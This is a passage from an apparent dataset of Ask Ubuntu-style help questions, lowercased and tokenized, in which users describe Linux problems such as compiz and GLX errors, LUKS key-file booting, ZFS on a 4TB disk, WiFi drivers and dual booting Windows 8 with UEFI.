pixmap type decoration when compositing is n't available compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 xlib : extension `` glx '' missing on display `` :0 '' . this continues for a long time , and then i get : xlib : extension `` glx '' missing on display `` :0 '' . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - error : plugin 'opengl ' not loaded . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 ( 4 ) checking on graphics devices using lspci : 07:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv370 [ radeon x600/x600 se ] ( prog-if 00 [ vga controller ] ) subsystem : advanced micro devices [ amd ] nee ati device 0b02 flags : bus master , fast devsel , latency 0 , irq 65 memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at dcde0000 ( 64-bit , non-prefetchable ) [ size=64k ] i/o ports at cc00 [ size=256 ] expansion rom at dce00000 [ disabled ] [ size=128k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] express endpoint , msi 00 capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 100 ] advanced error reporting kernel driver in use : radeon 07:00.1 display controller : advanced micro devices [ amd ] nee ati rv380 [ radeon x300/x550/x1050 series ] ( secondary ) subsystem : advanced micro devices [ amd ] nee ati device 0b03 flags : bus master , fast devsel , latency 0 memory at dcdf0000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] express endpoint , msi 00 any ideas ?
330653	no window-decorations when running compiz without sudo	i am running a barebones install of ubuntu server 13.04 , that i want to boot into a kiosk like application . for testing , i am launching into x running just xterm . when i boot up , if i do sudo compiz & in my .xsession , everything comes up fine ( my xterm window has decorations ) . if i run just compiz & , i do n't get any decorations ( although compiz is listed as a running process ) .
330654	how to export sms and contacts from cell phone to ubuntu	i am trying to export my text messages and my contacts from a cell phone ( an adroid samsung galaxy mini and a sony ericsson w810i ) to my ubuntu laptop . firstly i tried using wammu and i was easily able to export my text messages from the sony ericsson w810i ( not android phone ) . when it comes to the android samsung i can not even retrieve the messages let alone export them , however i can retrieve every calls and only the contacts that are saved in sim card . i also tried with xgnokii which for some reason can not start up as well as gmobilemedia which states that my phone is not supported . i also tried with gnome-phone-manager but what i get is thanos @ thanos-laptop : ~ $ gnome-phone-manager ** ( gnome-phone-manager:14036 ) : critical ** : bluetooth_chooser_button_set_property : assertion `bluetooth_verify_address ( g_value_get_string ( value ) ) || g_value_get_string ( value ) == null ' failed ** message : new connection device is empty ( not changed ) ** message : new connection device is empty ( not changed ) ** message : no device ! ** message : exiting connect thread i also tried other ports , but no phone can be found . the only way to see my messages is via the android application airdroid , but i am not able to save my messages and contacts in my pc . is there a way to save my text messages and contacts in my pc ?
330659	no network drivers after ubuntu netinstall	after a minimal/net installation of ubuntu 13.04 ( mini.iso ) both drivers for wifi and wired network are missing . wired : atheros 8131 i did some research here and it seems to compile the needed driver on my own is the preferred / only solution . wifi : centrino advanced-n 6230 since i have such a minimalistic installation , i do not even have gcc installed and hence it is kind of cumbersome . is there a way to get one of the needed drivers onto my freshly installed ubuntu with the live cd or anything else ?
330660	what is the correct way to use key file luks authorization ?	before filing new bug reports i decided to try to get support on my situation here . sorry for my english ( it may sound frustrating ) in advance , feel free to ask about additional details and thanks ! ! formatting questions is too complicated , sorry lol , so here is the text version just in case http : //paste.ubuntu.com/5967000/ the configuration is as simple as that ( no lvm , 2 hdds , no raid ) : - > /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/sda2_crypt / ext4 errors=remount-ro 0 1 # /boot was on /dev/sdc1 during installation uuid=664ca8af-34b8-4012-ba27-9f48044b6e4e /boot reiserfs notail 0 2 /dev/mapper/sdb1_crypt /media/storage ext4 noatime , sync 0 2 /dev/mapper/sda1_crypt none swap sw 0 0 - > /etc/crypttab sda1_crypt /dev/sda1 /dev/urandom cipher=aes-xts-plain64 , size=256 , swap sda2_crypt uuid=bc4ff5ca-d27a-423b-9ab1-806b64556ace /boot/key luks sdb1_crypt uuid=85baac75-dae4-4807-98dd-65d17d0c66f4 /boot/key luks /dev/sda2 and /dev/sdb1 have one & only slot0 for /boot/key authorization , which results in : update-initramfs : generating /boot/initrd.img-3.8.0-28-generic cryptsetup : warning : target sda2_crypt uses a key file , skipped and unbootable system . however , having sda2 with the one & only slot0 password authorization works flawless meaning automount during boot via luks key file auth for /dev/sdb1 - > /etc/crypttab sda1_crypt /dev/sda1 /dev/urandom cipher=aes-xts-plain64 , size=256 , swap sda2_crypt uuid=bc4ff5ca-d27a-423b-9ab1-806b64556ace none luks sdb1_crypt uuid=85baac75-dae4-4807-98dd-65d17d0c66f4 /boot/key luks getting support related to such configuration appeared to be not that easy , so maybe it 's not a bug , because atm i 'm not sure about the next moments : 1 . is it necessary to have a keyscript option in order to use luks authorization based on a key file for drive with mount point on / ( root fs ) ? the question appeared after looking at /usr/share/initramfs-tools/hooks/cryptroot ; reading the # 13 from https : //answers.launchpad.net/ubuntu/+source/cryptsetup/+question/37176 and : '' however , if you wish to make use of more complex setups ( such as root‐key‐on‐usb‐memory ) , you can create a script which does all the steps necessary to retrieve the key and then prints it to stdout . '' from here /usr/share/doc/cryptsetup/readme.initramfs.gz 2 . i `` can create '' it or i `` must '' in order to mount rootfs using key file ? the situation is totally unclear for me , because : why i need a keyscript ( if i need one ) for / device , but not for my /media/storage one ? taking in view my setup with key file for both on removable /boot . why do i need the key script if it is clear that removable /boot media with the key file is accessible due to the fact that /dev/sdb1 finally comes as mounted luks-mapped device on it 's mount point according to /etc/fstab ? if i do n't need the keyscript , why i 'm getting the warning from initramfs hook which checks if i have one or not for mounting root device ? ( ending up with unbootable system ) if above things are clearly defined , i have the last question : is this a bug or feature ? because it used to work in my previous 12.04 setup as i 'm trying to make it work now on freshly installed 13.04 , which means that something was fixed leaving me like that or otherwise some feature ( s ) were added . extra : # if keyscript is set , the `` key '' is just an argument to the script if [ `` $ key '' ! = `` none '' ] & & [ -z `` $ keyscript '' ] ; then echo `` cryptsetup : warning : target $ target uses a key file , skipped '' > & 2 return 1 fi } does it exist just to make sure i 'll get useless warning according to the fact it 's ! = none ? sorry for being so noob .
330664	kde dolphin file manager : configure places for all users	i 'm running a dual boot system with windows 7 - so have a bunch of ntfs and fat drives - c : , d : and e : i also have 2 more users for whom i 've set up accounts i 've managed to add fstab entries so that the drives are mounted and all users can read/write to these drives what i 'd like to do is be able to add 'friendly ' places nodes in dolphin so that all users see d-drive , c-drive , e-drive rather than the volume label or disk blk id . i 've added it to my account and can see the config file in ~/.local/share/user-places.xbel - but would like to know what 's the best way to do this for 'all users ' by default ? thanks !
330666	zfs on > 2tb disk in ubuntu 12.04 ?	i just got a 4tb disk and i 'm running ubuntu 12.04. http : //www.thegeekstuff.com/2012/08/2tb-gtp-parted/ says you need to partition your disk with gpt if you want to use > 2tb ( and that you can do this with fdisk/gparted ) . however i 'm interested in using zfs . however , every tool i 've tried only reports 2tb , and the hdparm -n output for reporting max sectors is sketchy : $ uname -a linux nuthouse 3.2.0-49-generic # 75-ubuntu smp tue jun 18 17:39:32 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ dmesg | fgrep sde [ 2505154.456871 ] sd 5:0:0:0 : [ sde ] 488370432 4096-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 2505154.460111 ] sd 5:0:0:0 : [ sde ] no caching mode page present [ 2505154.460117 ] sd 5:0:0:0 : [ sde ] assuming drive cache : write through [ 2505154.508410 ] sde : sde1 sde9 $ sudo hdparm -n /dev/sde /dev/sde : sg_io : bad/missing sense data , sb [ ] : 70 00 02 00 00 00 00 0a 00 00 00 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 sg_io : bad/missing sense data , sb [ ] : 70 00 02 00 00 00 00 0a 00 00 00 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 max sectors = 0/1 , hpa is enabled $ sudo parted /dev/sde print model : wd my book 1140 ( scsi ) disk /dev/sde : 2000gb sector size ( logical/physical ) : 4096b/4096b partition table : gpt number start end size file system name flags $ sudo gdisk /dev/sde gpt fdisk ( gdisk ) version 0.8.1 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . command ( ? for help ) : p disk /dev/sde : 488370432 sectors , 1.8 tib logical sector size : 4096 bytes disk identifier ( guid ) : 2b18fe55-5944-2946-a9c6-69c21efeeab8 partition table holds up to 128 entries first usable sector is 6 , last usable sector is 488370426 partitions will be aligned on 256-sector boundaries total free space is 488370421 sectors ( 1.8 tib ) number start ( sector ) end ( sector ) size code name command ( ? for help ) : v no problems found . 488370421 free sectors ( 1.8 tib ) available in 1 segments , the largest of which is 488370421 ( 1.8 tib ) in size . command ( ? for help ) : q $ sudo zpool create tank /dev/sde $ sudo zpool list name size alloc free cap dedup health altroot tank 1.81t 576k 1.81t 0 % 1.00x online - $ sudo parted /dev/sde print model : wd my book 1140 ( scsi ) disk /dev/sde : 2000gb sector size ( logical/physical ) : 4096b/4096b partition table : gpt number start end size file system name flags 1 8389kb 2000gb 2000gb zfs 9 2000gb 2000gb 67.1mb $ sudo gdisk /dev/sde gpt fdisk ( gdisk ) version 0.8.1 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . command ( ? for help ) : p disk /dev/sde : 488370432 sectors , 1.8 tib logical sector size : 4096 bytes disk identifier ( guid ) : 2b18fe55-5944-2946-a9c6-69c21efeeab8 partition table holds up to 128 entries first usable sector is 6 , last usable sector is 488370426 partitions will be aligned on 256-sector boundaries total free space is 2293 sectors ( 9.0 mib ) number start ( sector ) end ( sector ) size code name 1 2048 488353791 1.8 tib bf01 zfs 9 488353792 488370175 64.0 mib bf07 command ( ? for help ) : v no problems found . 2293 free sectors ( 9.0 mib ) available in 2 segments , the largest of which is 2042 ( 8.0 mib ) in size . command ( ? for help ) : q how should i proceed ? thanks for any hints .
330669	how to setup wifi network to access internet	i am new to ubuntu/linux . after some efforts i got the internet working with pppoeconf . now i have desktop setup with ubuntu + d-link dsl 2730u adsl modem router + brodband internet ( bsnl india ) connection . i would like to share and use this connection with mobile/laptop as well . could someone please guild me how can i do this under ubuntu . i checked some other threads and checked lspci|grep -i wireless command output . so this does not get any output on my terminal .
330672	wifi connection up and down kubuntu 13.04	currently i am using an ethernet cable . the problem is that my wifi connection is up and down , sometimes it works sometimes it does n't . i get a list of networks to choose from and instead of connecting , the wpa2 password box for my wireless router keeps popping up . i am running kubuntu 13.04 on my asus x501a , i am assuming there is a problem with my driver , but i just can not seem to pinpoint issue . i 'm sorry if this is posted elsewhere any help with my issue would be much appreciated other than this i love the new release .
330674	how to unistall dropbox from ubuntu ?	hemant @ hmnt-pc : ~ $ sudo apt-get remove nautilus-dropbox e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? hemant @ hmnt-pc : ~ $ this error comes after i input the following command sudo apt-get remove nautilus-dropbox can anyone suggest a way around this , please ?
330676	install ubuntu got stuck on prepare to install	i am installing ubuntu i marked both `` download updates '' & `` install 3rd party soft '' from last 1/2 hour the mouse pointer is rotating . i am connected to mobile broadband connection . what should i do now ?
330680	bootable usb of ubuntu 13.04 without the gui ?	i was wondering if there is a way to create a usb bootable image of ubuntu without the gui such as making it text based ?
330685	issue with alpsps/2 alps glidepoint touchpad on dell precision m6700	my touchpad is extremely choppy . i 'm not sure if this is a driver issue or what . i tried following the steps in answer : alps touchpad on dell : how do i install the dkms driver to enable multitouch ? but all of the links are out-dated/do not work , not to mention a lot of the commands sound like complete german to a new linux user . i 've been googling on this issue for 3 hours to no avail . i 'm completely stuck at this point and of ideas so any help would be greatly appreciated .
330689	ca n't start up pc after trying to instal ubuntu	today i tryied to install ubuntu 13.04 x64 bit , after trying to instal it with deamon tools my pc tripped , and tried to reboot . but when it tries to boot it says : ubuntu no such device : a long code ... . after that i went to my mom 's pc and made my usb bootable with ubuntu.i 've installed ubuntu on my 200gb harddisk . and everything works fine i can chose wich os i want to use and i can get back on my pc . now when i want to get behind my computer i need to do this : i need to go to my boot menu , change to the 200gb hdd , start from there select my windows 8 , once in windows 8 it says wich one os u want to select and select windows 8 . so here is the question , how can i fix my ssd boot ? since that i need to boot from my 200gb disk . and how can i deinstal ubuntu from my ssd ? because its now on my ssd and on my 200gb disk ... greets , mark .
330698	how to install grub customizer into lubuntu 12.04	i 'm having problems installing grub customizer into lubuntu 12.04 i tried the code sudo add-apt-repository ppa : danielrichter2007/grub-customizer sudo apt-get update sudo apt-get install grub-customizer but it wo n't install
330704	problem using rtl8723e in ubuntu 12.04.2	i have a notebook with realtek 8723 wireless card and i 'm having some difficulties to connect with it . i 've followed the instructions of this topic and it worked well . however , while i was watching a video in firefox , the entire system crashed and i was forced shutdown using power button . when i started ubuntu again , it do n't identify any wireless network . i 've reinstalled the module but it did n't worked . the module is loaded but do n't find any network . what could be the cause of this problem ? hudson @ hudson-avell : ~ $ modinfo rtl8723e filename : /lib/modules/3.5.0-37-generic/kernel/drivers/net/wireless/rtlwifi/rtl8723e/rtl8723e.ko firmware : rtlwifi/rtl8723efw.bin description : realtek 8723e 802.11n pci wireless license : gpl author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 161cc0ce5ce8dd8f90d732e alias : pci : v000010ecd00008723sv*sd*bc*sc*i* depends : rtlwifi , mac80211 vermagic : 3.5.0-37-generic smp mod_unload modversions parm : swlps : bool parm : swenc : using hardware crypto ( default 0 [ hardware ] ) ( bool ) parm : ips : using no link power save ( default 1 is open ) ( bool ) parm : fwlps : using linked fw control power save ( default 1 is open ) ( bool )
330706	stream video to my home network	i would like stream a video on my home network so i can watch it on my android tablet . i attempt to do this using vlc 2.0.8 on ubuntu but it did n't work . can anyone walk me through the exact steps you need ? i selected media- > stream then `` add '' and chose the video . i then clicked `` stream '' at the bottom of the page then next , then for new destination i chose http ( more or less at random ) i unchecked activate transcoding , next , added a name for `` sap announce '' , then stream . i see the error [ 0x9ac4908 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . [ 0xb1600628 ] main stream output error : stream chain failed for `' [ 0xb5400618 ] main input error : can not start stream output instance , aborting in a terminal at that point .
330710	pyqt app deployment	i 'm developing four bioinformatic software 's with pyqt . i mostly target windows os users but since the programs run without any problems on ubuntu , i thought to upload them to the usc ( i also got several requests ) . however , i 'm a bit worry whether this makes sense because last year i participated the ubuntu app showdown and my app is still pending review . is there an easy way to create debian packages ( similar to quickly ) or can i simply upload the source ? is the reviewer process `` dead '' or not interested in scientific tools ? in short , does it makes sense to invest time in deployment to the usc ? thanks in advance ! stefanie
330711	why does n't bumblebee work with nvidia gtx675m in ubuntu 12.04.2	i 'm trying use my nvidia video card in ubuntu 12.04.2 but without success . the model of my video card is gtx675m . i 've installed bumblebee using the following commands : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates -y & & sudo add-apt-repository ppa : bumblebee/stable -y & & sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia after the installation i restarted ubuntu and tried to run : hudson @ hudson-avell : ~ $ optirun glxspheres [ 8526.101459 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 8526.101532 ] [ error ] aborting because fallback start is disabled . my /etc/bumblebee/bumblebee.conf is this : [ bumblebeed ] virtualdisplay=:8 keepunusedxserver=false servergroup=bumblebee turncardoffatexit=false noecomodeoverride=false driver= xorgconfdir=/etc/bumblebee/xorg.conf.d [ optirun ] bridge=auto vgltransport=proxy primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus allowfallbacktoigc=false [ driver-nvidia ] kerneldriver=nvidia-current pmmethod=auto librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau i did the following changes : driver= [ driver-nvidia ] kerneldriver=nvidia module=nvidia-current but this time the message is saying that bumblebee is not running . what should i do to solve this problem ?
330718	duplicate entries in update-alternatives	i have two entries for vim when i input sudo update-alternatives -- config editor selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * 0 /usr/local/bin/vim 100 auto mode 1 /bin/ed -100 manual mode 2 /bin/nano 40 manual mode 3 /usr/bin/vim.tiny 10 manual mode 4 /usr/local/bin/vim 100 manual mode selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/local/bin/vim 100 auto mode 1 /bin/ed -100 manual mode * 2 /bin/nano 40 manual mode 3 /usr/bin/vim.tiny 10 manual mode 4 /usr/local/bin/vim 100 manual mode why does this happen and how can i remove it ?
330720	acpi on asus nv56v ubuntu 13.04	i 'm rather new to ubuntu and just made a fresh install of ubuntu 13.04 alongside windows 8 on my new asus n56v , however i could n't make it shut down , reboot or logout properly which i taught was odd , so i googled abit and got the answer that i should turn off acpi setting in grub ( wrote acpi_osi in the linux quiet splash line ) this sort of solved my problem because with it turned off i can shut it down and log out from the computer properly as far as i can see . however this made the battery indicator get all messed up i wonder if there is any way to solve my problem without turning the acpi setting off , or to keep it off but have the battery indicator work as intended and not giving false data aswell as having the battery led notification on my laptop not blinking orange constantly as if the battery was low
330721	problem with dual boot with windows 8 .	ubuntu installs correctly , but then when i boot computer no ubuntu boot option appears . i am not very familiar with linux systems , but when i install ubuntu using a usb it says that everything installed correctly . then when i restart the computer no boot menu appears to boot ubuntu . instead the computer boots straight to windows . do i need to install grub2 or something to bring up a boot menu ? i 've looked at the other forums for an answer to this question and they have n't helped .
330723	mounted own filesystem instead of usb ?	i am completely unfamiliar with how *nix handles partitions , but i needed to get a file off of my usb drive so i followed an online post ( http : //forums.debian.net/viewtopic.php ? f=10 & t=104774 ) that said you could mount a usb stick with : sudo mount -t auto /dev/sdb1 /mnt so i did , but now ls /mnt returns the contents of my computer 's /home/ directory , and i am afraid to unmount it . how can i get out of this situation without compromising any data , and for bonus points , where can i find an accessible explanation of how to mount a usb drive ? thanks .
330724	arduino ide hud menu	arduino ide like eclipse ide have no a natural integration with ubuntu hud menu , but on eclipse i found here and here good tutorials to fix and it works perfectly like you can see on print , but i not found a way to do the same hack on arduino ide.. how i can do it ?
330733	repair ntfs without windows ?	my machine only has ubuntu installed ( 13.04 ) but one data drive is ntfs ( because i did n't realize that the disk was ntfs formatted when i started using it ) . i now used gparted to reduce the partition and make room for a new data partition in ext4 format so that i can move the data there instead , then delete the ntfs partition and resize the ext4 partition to use the entire disk . after reducing the ntfs partition and creating the ext4 partition , gparted now gparted has an exclamation mark ( top ) and tells me this ( bottom ) . i 'm asked to run windows checkdisk twice , but i do n't have windows installed and it 's very tedious to pull the drive out of the computer and hunt down a windows pc with sata connectors . is there any way for me to fix this , besides using windows ? the ntfs data partition is not available until i 've fixed it , so i ca n't read its data and copy it to the new ext4 partition . if i could just reliably read it , this problem might be irrelevant . final update and solution : i ca n't accept either answer because the linux tools could not resolve the problem . in the end , i booted my machine with a windows 7 installation disk and started the repair/recovery function . in there , i could open a command prompt and run the chkdsk /f which solved the problem : - )
330735	.deb built in ppa does n't install my binary	i 'm going insane here . i 've built a tool that does n't need any actual compilation - it 's just a perl script - and when i run bzr builddeb on it , i get a working .deb file which copies my script - zfsync - to /usr/bin/zfsync when i run dpkg -i zfsync_1.0.0-0ubuntu3_all.deb . however , when i run bzr builddeb -s and then dput the resulting source.changes file to my ppa , it builds without errors ... but apt-get install zfsync results in a `` successful '' installation , only my binary is n't actually placed in /usr/bin ! i have a debian/install file which contains zfsync usr/bin and nothing else . out of desperation , i created a simple makefile which , if make install is run , will copy zfsync to /usr/bin also . nothing seems to help , though , and the half-hour `` build '' time on canonical 's godawful arm-based ppa farm is making me lose my mind . when i do an apt-get source zfsync , looking in the source directory fetched shows me no debian/install file whatsoever . i do n't know why the ppa is stripping that file , but it apparently is - and without it , my script does n't actually get installed . please , please , are there any packaging gurus out there ? help !
330736	psiphon 3 & compile a package	i am a newbie and i use xfce desktop based on 12.10 . psiphon 3 is open source but i have 2 questions : how can i download the source . when i go to the related site , there 's not a file but so many different directories ( as a tree ) and it confuses me . can you tell me a step by step tutorial to compile my own psiphon 3 ?
330739	mouse dysfunction	i 'm using ubuntu 13.04 . each session ends with the same phenomenon . no matter what program i use on ubuntu , at some time the mouse shows the following dysfunction : the mouse works only in the current running window . it is not possible to finish the current window with the mouse . mousepointer can be moved , but has no further function . cancelling with the keyboard is still possible . error occurs with any other mouse , but the definite moment of dysfunction is not replicable . sometimes error remains even after reboot . system is installed parallel to windows 7 32-bit . ubuntu is also 32-bit . thanks for your help .
330740	ubuntu 13.04 mousepad	i 'm dual-booting ubuntu 13.04 . originally , my laptop came with windows , and i was able to double-tap a corner of the mousepad to toggle it 's functionality , however that toggle does not work in ubuntu . is there a way to 'manually ' toggle mousepad functionality ?
330741	why does uefi installer not run on my efi machine ?	have been working on building a multi boot system using efi . this efi capable system can not boot ubuntu or any other installation media using efi with the only exception being windows installation media . most distributions appear to be using grub for their boot manager and boot loader so trying different distributions and tools such as parted magic and boot repair give same results when trying to boot efi mode in order for an efi install to be done . what happens when trying to boot media efi mode is if efi grub manager loads ( black screen ) and if any choice is selected ( try ubuntu , install ubuntu or verify ) get error can not read disk and the kernel need to be loaded first ) . there appears to be no explanation online ( that i have found so far ) that goes anywhere near describing how and why this happens . the accepted way of installing ubuntu to an efi system is apparently switched off efi and install in legacy mode which involves creating a bios-grub partition before commencing or let boot-repair to do the fix after installing ubuntu in legacy mode . boot repair detects efi system and creates the bios_grub partition and installs grub-efi . so after getting ubuntu and windows booting using efi i noticed the grub_bios partition was still in existence so i removed it with gdisk and still have windows and ubuntu booting . why does n't boot-repair delete bios_grub partition after installing grub-efi ? 14/08/2013 update : after installing refind boot-repair cd now boots efi mode . is bios_grub some kind of mbr partition ? how does this differ from a protective mbr which is in efi partition ? online there is some reference to secure boot causing system to throw `` you need to load kernel first '' error or simply to hang at a black screen . what causes the `` you need to load kernel first '' error on system that appears to not being using secure boot as there is nothing in firmware settings or vendor documentation that mentions this . windows upgrade assistant says this system is not secure boot capable . are there different versions of secure boot ? how to identify if system is secure boot capable ? this system uses efi instead of uefi . does this use different secure boot ? why does the uefi installer not run on this machine ?
330746	stuck on grub screen ubuntu13.04	i tried installing ubuntu 13.04 alongside windows 8 on my asus k55v laptop ( it came with windows 8 preinstalled ) via usb , however whenever i try to boot ubuntu i just get to the command line prompt . i 've successfully installed 12.04 using the same method before , although a few applications did n't work ( eg wine , steam and compizconfig ) , so i figured i 'd try 13.04 instead . i 've tried this solution : tried to boot ubuntu , but the grub rescue shows up instead but whenever i try running configfile it pauses for a second , clears the screen and asks for the next prompt . any ideas ?
330747	what to do with tar.gz	i am quite new to ubuntu and i am trying to install node.js on 12.04 . i have the source code in a tar.gz . i am not sure what i need to do with this file . i guess i need to extract it but is there a recommended place i extract it too ? also after extracting it should i just be able to use it from the command line or do i need to do anything else ?
330754	mouse middle click opens dash in 13.04 , regardless of application	does anyone know how to change the behavior of my mouse middle-click button ? it always opens the dash no matter what application i am in . it 's a wireless logitech t400 if that matters . thanks .
330755	`` unsafe permissions on configuration file `/home/david/.gnupg/gpg.conf '' what does it mean and how to fix ?	gpg : warning : unsafe permissions on configuration file `/home/david/.gnupg/gpg.conf' gpg : warning : unsafe enclosing directory permissions on configuration file `/home/david/.gnupg/gpg.conf' gpg : external program calls are disabled due to unsafe options file permissions gpg : keyserver communications error : general error gpg : keyserver receive failed : general error what does it mean and how to fix ?
330757	dell inspiron 1501 problems wifi/ upgrading	i recently installed ubuntu 11.04 on an inspiron 1501 with an amd sempron . i think the ram is probably low because it is very slow . googling the problem , i noticed that a problem with the coding in dells shuts off the wifi card . the solution seems to be to input this code . sudo apt-get remove -- purge bcmwl-kernel-source sudo apt-get install linux-firmware-nonfree however , once i did that , it made the wifi settings visible , but still not accessible . before enter the code , you could n't even see the words . now it says wireless networks and device not ready ( firmaware missing ) . if the solution is to update ubuntu , then that leads to my next problem . i ca n't install any additional software on it . i go through the software center , but as i try to install , it says the following : failed to download repository information . i am not an it guy . please help if you can .
330763	webcam studio 13.04	i need to stream with watermarks . people say i need to use webcam studio to do that it installs but when i open it the only thing i have is `` the module webcamstudio is not loaded . virtual webcam will not be available . '' the guide on the app google page has nothing in `` installation '' . i 'm getting angry at this
330772	burning files and directories with long unicode names	is there any cd/dvd burning app/iso format which supports files and directories with long non-english ( unicode ) names ? apparently joliet-long iso standard supports filename up to 103 characters , but i 'm not sure if it supports unicode as well , and if brasero or any other gnome app can burn dvds with this format . i found out that an app called gburner does quite a decent job , but unluckily it 's a win app . i have to burn the contents of my external hdd , but since my data contains many downloaded pages ( with companion html pages ' directories containing pictures , js scripts , css styles , and so on ) and since many of those filenames contain non-english characters , i need some app/format to be capable of burining them safely on a dvd ( without the old-fashioned need to compress the contents under a english filename ) , such that the content is readable on linux and win machines .
330773	no username on login screen	when i get to the login screen for ubuntu 12.10 , it asks for me to type in my username which i thought i knew but apparently its wrong . when i log into quest , everything is fine except i need a password for authentication . i cant recover my password without username either .
330774	nfc host card emulation for ubuntu mobile devices	does anyone know if nfc host card emulation is supported on ubuntu natively ? if not , we would like to supply the patch for it .
330779	unable to install virtual box on ubuntu 12.04 lts x64	i downloaded x64 version of virtualbox from its official site as i am having ubuntu 12.04 lts x64 version . its of 64 mb .deb file . now when i try to install it , it is causing error . package operation failed the installation or removal of a software package failed . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 145794 files and directories currently installed . ) unpacking virtualbox-4.2 ( from ... /virtualbox-4.2_4.2.16-86992~ubuntu~precise_amd64.deb ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory xz : ( stdin ) : compressed data is corrupt dpkg-deb ( subprocess ) : subprocess data returned error exit status 1 dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg-deb ( subprocess ) : failed in write on buffer copy for failed to write to pipe in copy : broken pipe dpkg : error processing /home/anujsharma/desktop/virtualbox-4.2_4.2.16-86992~ubuntu~precise_amd64.deb ( -- install ) : short read on buffer copy for backend dpkg-deb during `./usr/share/doc/virtualbox-4.2/virtualbox.chm' processing triggers for ureadahead ... every time this is happening dont know why.. please help .
330780	how do you know , using the cli , the type of partition that corresponds to its id ?	fdisk , and many other partition programs list the partition tables using a code or id for the partition type of each partition listed . how do you know the type of the partition , the type name ( in /proc/filesystems ) that corresponds to each code ? so that you can use it , for example , in the -t option in the mount program ? is there a file , like /etc/services for services and ports , that matches each filesystem type with its code ? i think there should be one . there probably was one years ago .
330781	how to create launcher for application ?	i am using ubuntu 13.04 , i recently downloaded fritzing .tar.bz2 , which i extracted it & there is one .sh file , which i have to execute everytime from terminal to run the application . my question is , is it possible to create a launcher of fritzing & make it show up in applications in dash ? if it is , then please help me out with steps . thank you .
330782	grub boots windows 8 , but not ubuntu 13.04	so when i start my computer grub comes up just fine and i have 4 options . ubuntu ; advanced options for ubuntu ; windows uefi bkgbootmgfw.ofi ; windows boot uefi loader . the windows boot uefi loader option starts windows 8 just fine . when i choose the ubuntu option i get nothing but a blank purple screen . the advanced ubuntu options have a bit of text displayed when i select them , but they still do nothing . they are ubuntu , with linux 3.8.0-19-generic ; ubuntu , with linux 3.8.0-19-generic ( recovery mode ) . the text before the system hangs is starting linux 3.8.0-19-generic ... loading initial ram disk ... i have been trying to install ubuntu 13.04 to duel boot with windows 8 using uefi . i followed the instructions here https : //help.ubuntu.com/community/uefi . of note is that i was unable to directly install ubuntu in uefi mode . i had to install it in legacy and then use boot-repair to convert it to uefi as instructed in the link above . when i clicked apply it asked me to execute a few commands in the terminal . sudo dpkg -- configure -a sudo apt-get install -fy sudo apt-get purge -y -- force-yes grub*-common suim-signed linux-signed* it asked me if i wanted to remove grub . i said yes . then it had me enter sudo apt-get install-y -- force-yes grub-efi linux so i reinstalled ubuntu 